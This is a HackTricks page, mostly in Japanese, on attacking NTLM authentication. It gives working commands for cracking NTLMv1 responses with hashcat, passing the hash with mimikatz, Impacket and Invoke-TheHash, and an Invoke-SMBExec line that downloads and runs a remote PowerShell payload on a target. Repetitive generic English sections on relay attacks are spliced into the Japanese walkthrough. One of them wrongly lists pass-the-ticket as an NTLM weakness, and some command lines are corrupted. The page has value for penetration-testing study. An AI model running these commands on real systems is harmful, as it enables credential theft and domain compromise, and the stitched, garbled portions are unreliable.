hacktricks/windows-hardening/ntlm

NTLM

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたいですか、またはHackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見つけます
• 公式PEASS＆HackTricks swagを手に入れましょう
• 💬 Discordグループまたはtelegramグループに参加するか、Twitterで**🐦**@carlospolopmをフォローしてください。
• ハッキングトリックを共有するために hacktricks repo と hacktricks-cloud repo にPRを提出してください。

基本情報

NTLM資格情報: ドメイン名（あれば）、ユーザー名、パスワードハッシュ。

LMはWindows XPおよびサーバー2003でのみ有効です（LMハッシュはクラック可能）。LMハッシュAAD3B435B51404EEAAD3B435B51404EEは、LMが使用されていないことを意味します（空の文字列のLMハッシュです）。

デフォルトではKerberosが使用されるため、NTLMはActive Directoryが構成されていない、ドメインが存在しない、Kerberosが機能していない（構成が不良）、またはクライアントが有効なホスト名の代わりにIPを使用して接続しようとする場合にのみ使用されます。

NTLM認証のネットワークパケットにはヘッダー "NTLMSSP" があります。

プロトコル：LM、NTLMv1、およびNTLMv2は、DLL %windir%\Windows\System32\msv1_0.dll でサポートされています。

LM、NTLMv1およびNTLMv2

使用されるプロトコルを確認および設定できます：

GUI

_secpol.msc_を実行 -> ローカルポリシー -> セキュリティオプション -> ネットワークセキュリティ：LANマネージャー認証レベル。 レベルは6つあります（0から5まで）。

レジストリ

これにより、レベル5が設定されます：

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

可能な値:

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

基本的なNTLMドメイン認証スキーム

1. ユーザーが資格情報を入力します
2. クライアントマシンが認証リクエストを送信し、ドメイン名とユーザー名を送信します
3. サーバーがチャレンジを送信します
4. クライアントはパスワードのハッシュを使用してチャレンジを暗号化し、応答として送信します
5. サーバーがドメインコントローラーにドメイン名、ユーザー名、チャレンジ、応答を送信します。Active Directoryが構成されていない場合や、ドメイン名がサーバー名の場合、資格情報はローカルで確認されます。
6. ドメインコントローラーがすべてが正しいかどうかを確認し、情報をサーバーに送信します

サーバーとドメインコントローラーは、NTDS.DITデータベース内にサーバーのパスワードがあるため、Netlogonサーバーを介してセキュアチャネルを作成できます。

ローカルNTLM認証スキーム

認証は以前に述べたものと同じですが、サーバーはSAMファイル内で認証しようとするユーザーのハッシュを知っています。したがって、ドメインコントローラーに問い合わせる代わりに、サーバー自体がユーザーの認証を確認します。

NTLMv1チャレンジ

チャレンジの長さは8バイトで、応答は24バイトです。

NTハッシュ（16バイト）は7バイトずつ3つの部分に分かれます（7B + 7B +（2B + 0x00*5））：最後の部分はゼロで埋められます。その後、各部分ごとにチャレンジが別々に暗号化され、結果の暗号化されたバイトが結合されます。合計：8B + 8B + 8B = 24バイト。

問題点：

• ランダム性の欠如
• 3つの部分は個別に攻撃され、NTハッシュが見つかる可能性があります
• DESは破られやすい
• 3番目のキーは常に5つのゼロで構成されています。
• 同じチャレンジが与えられると、応答は同じになります。したがって、被害者に対して文字列「1122334455667788」をチャレンジとして与え、事前計算されたレインボーテーブルを使用して使用された応答を攻撃できます。

NTLMv1攻撃

最近では、無制限委任が構成された環境を見つけることが少なくなっていますが、これは悪用できないことを意味しないことに注意してください。

ADで既に持っている一部の資格情報/セッションを悪用して、プリントスプーラーサービスを構成してホストを操作下に認証させることができます。その後、metasploit auxiliary/server/capture/smbまたはresponderを使用して、認証チャレンジを1122334455667788に設定し、認証試行をキャプチャし、それがNTLMv1を使用して行われた場合、破ることができます。
responderを使用している場合は、認証をダウングレードしようとして、**フラグ--lm**を使用してみることができます。
このテクニックでは、認証はNTLMv1を使用して実行する必要があることに注意してください（NTLMv2は有効ではありません）。

プリンターは認証中にコンピューターアカウントを使用し、コンピューターアカウントは長くランダムなパスワードを使用していますが、一般的な辞書を使用して破ることはできない可能性があります。しかし、NTLMv1認証はDESを使用しています（詳細はこちら）、そのため、DESを破るために特に専用のサービスを使用することで、それを破ることができます（たとえば、https://crack.sh/を使用できます）。

hashcatを使用したNTLMv1攻撃

NTLMv1はNTLMv1 Multi Tool https://github.com/evilmog/ntlmv1-multiを使用して、hashcatで破ることができる形式でNTLMv1メッセージをフォーマットできます。

コマンド

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

NTLM Relay Attack

Introduction

NTLM relay attacks are a common technique used by attackers to escalate privileges in a Windows environment. This attack involves intercepting NTLM authentication traffic and relaying it to a target server to gain unauthorized access.

How it Works

1. The attacker intercepts NTLM authentication traffic between a client and a server.
2. The attacker relays this traffic to another server, tricking it into believing the attacker is the legitimate user.
3. The attacker can then execute commands on the target server with the privileges of the compromised user.

Mitigation

To mitigate NTLM relay attacks, consider implementing the following measures:

• Enforce SMB Signing: Require SMB signing to prevent tampering with authentication traffic.
• Enable LDAP Signing: Enable LDAP signing to protect against relay attacks on LDAP traffic.
• Use Extended Protection for Authentication: This helps protect against NTLM relay attacks by requiring channel binding tokens.

By implementing these measures, you can significantly reduce the risk of falling victim to NTLM relay attacks.

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

NTLM Relaying

Introduction

NTLM relaying is a common technique used by attackers to escalate privileges in a Windows environment. This attack involves intercepting an NTLM authentication request and relaying it to another machine, tricking the target into authenticating against a malicious server.

How it Works

1. The attacker intercepts an NTLM authentication request from a victim machine.
2. The attacker relays the authentication request to a different machine on the network.
3. The malicious server on the network then forwards the authentication request to a target server.
4. The target server responds to the authentication request, thinking it is coming from the victim machine.
5. The attacker gains access to the target server using the victim's credentials.

Mitigation

To prevent NTLM relaying attacks, consider implementing the following measures:

• Disable NTLM authentication in favor of more secure protocols like Kerberos.
• Enable SMB signing to prevent tampering with SMB traffic.
• Implement Extended Protection for Authentication to protect against relaying attacks.
• Use Group Policy to restrict NTLM usage in the network.

By implementing these measures, you can significantly reduce the risk of NTLM relaying attacks in your Windows environment.

727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

実行するhashcat（分散はhashtopolisなどのツールを介して最適です）これにはそれ以外に数日かかります。

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

この場合、パスワードが「password」であることがわかっているので、デモ目的で不正行為を行います。

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

次に、hashcatユーティリティを使用して、クラックされたDESキーをNTLMハッシュの一部に変換する必要があります：

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

NTLM

Overview

NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. It is commonly used for single sign-on and is the default authentication protocol in Windows environments.

Weaknesses

NTLM has several weaknesses that make it vulnerable to attacks, including:

• Pass-the-Hash: Attackers can use the hash of a user's password to authenticate as that user without knowing the actual password.
• Pass-the-Ticket: Attackers can use stolen ticket-granting tickets to authenticate to services as a legitimate user.
• Relay Attacks: Attackers can relay authentication attempts to other services, allowing them to impersonate users.

Mitigations

To mitigate the weaknesses of NTLM, consider the following measures:

• Disable NTLM: Whenever possible, disable NTLM in favor of more secure authentication protocols like Kerberos.
• Enforce SMB Signing: Require SMB signing to protect against man-in-the-middle attacks.
• Enable LDAP Signing: Enable LDAP signing to prevent man-in-the-middle attacks on LDAP traffic.
• Use Extended Protection for Authentication: Enable Extended Protection for Authentication to protect against NTLM relay attacks.

By understanding the weaknesses of NTLM and implementing these mitigations, you can improve the security of your Windows environment.

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

NTLM Relay Attack

Overview

NTLM relay attacks are a common technique used by attackers to exploit the NTLM authentication protocol. By intercepting and relaying NTLM authentication messages, an attacker can impersonate a legitimate user and gain unauthorized access to resources on a network.

How it works

1. The attacker intercepts an NTLM authentication request from a victim machine to a server.
2. The attacker relays the authentication request to another server on the network.
3. The second server responds to the authentication request, believing it is coming from the victim machine.
4. If successful, the attacker can access resources on the second server using the victim's credentials.

Mitigation

To protect against NTLM relay attacks, consider implementing the following measures:

• Disable NTLM authentication in favor of more secure protocols like Kerberos.
• Enable SMB signing to prevent tampering with authentication messages.
• Implement Extended Protection for Authentication to prevent relay attacks.
• Use strong, unique passwords to make credential theft more difficult for attackers.

By taking these steps, you can help secure your network against NTLM relay attacks and protect sensitive information from unauthorized access.

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

NTLMv2 チャレンジ

チャレンジの長さは 8 バイトであり、2 つのレスポンスが送信されます：1 つは24 バイトで、もう 1 つの長さは可変です。

最初のレスポンスは、クライアントとドメインから構成される文字列を使用してHMAC_MD5を使って暗号化し、NT ハッシュのMD4 ハッシュをキーとして使用します。その後、結果はチャレンジを暗号化するためのキーとして使用されます。これに8 バイトのクライアント チャレンジが追加されます。合計：24 B。

2 番目のレスポンスは、複数の値（新しいクライアント チャレンジ、リプレイ攻撃を回避するためのタイムスタンプなど）を使用して作成されます。

成功した認証プロセスをキャプチャした pcap ファイルがある場合、このガイドに従ってドメイン、ユーザー名、チャレンジ、レスポンスを取得し、パスワードを解読してみることができます：https://research.801labs.org/cracking-an-ntlmv2-hash/

パス・ザ・ハッシュ

被害者のハッシュを取得したら、それを偽装することができます。
そのハッシュを使用して NTLM 認証を実行するツールを使用する必要があります。または、新しいセッションログオンを作成し、そのハッシュをLSASSにインジェクトすることができます。そのため、NTLM 認証が実行されるときにそのハッシュが使用されます。 最後のオプションは mimikatz が行うことです。

パス・ザ・ハッシュ攻撃はコンピュータ アカウントを使用しても実行できることを覚えておいてください。

Mimikatz

管理者として実行する必要があります

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

これにより、mimikatzを起動したユーザーに属するプロセスが開始されますが、LSASS内部では、保存された資格情報はmimikatzパラメータ内にあります。その後、そのユーザーであるかのようにネットワークリソースにアクセスできます（runas /netonlyトリックに類似していますが、平文パスワードを知る必要はありません）。

LinuxからのPass-the-Hash

LinuxからPass-the-Hashを使用してWindowsマシンでコード実行を取得できます。
こちらをクリックして方法を学んでください。

Impacket Windowsコンパイル済みツール

Windows用のimpacketバイナリをこちらからダウンロードできます。

• psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
• wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
• atexec.exe（この場合、コマンドを指定する必要があります。cmd.exeとpowershell.exeは対話型シェルを取得するために有効ではありません）C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
• 他にもいくつかのImpacketバイナリがあります...

Invoke-TheHash

こちらからpowershellスクリプトを入手できます: https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-SMBExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-WMIExec

Invoke-WMIExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBClient

Invoke-SMBClient

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

Invoke-SMBEnum

Invoke-SMBEnum

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash

この機能は他のすべての機能を組み合わせたものです。複数のホストを渡すことができ、除外することもでき、使用したいオプションを選択できます（SMBExec、WMIExec、SMBClient、SMBEnum）。SMBExecとWMIExecのいずれかを選択した場合でも、Command パラメータを指定しない場合は、単に十分な権限があるかどうかをチェックします。

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

Evil-WinRM パス・ザ・ハッシュ

Windows Credentials Editor (WCE)

管理者として実行する必要があります

このツールはmimikatzと同じことを行います（LSASSメモリを変更します）。

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

ユーザー名とパスワードを使用した手動のWindowsリモート実行

{% content-ref url="../lateral-movement/" %} lateral-movement {% endcontent-ref %}

Windowsホストからの資格情報の抽出

Windowsホストから資格情報を取得する方法についての詳細は、このページを読んでください。

NTLMリレーとレスポンダー

これらの攻撃を実行する方法の詳細なガイドについては、こちらを読んでください。

ネットワークキャプチャからNTLMチャレンジを解析する

https://github.com/mlgualtieri/NTLMRawUnHideを使用できます。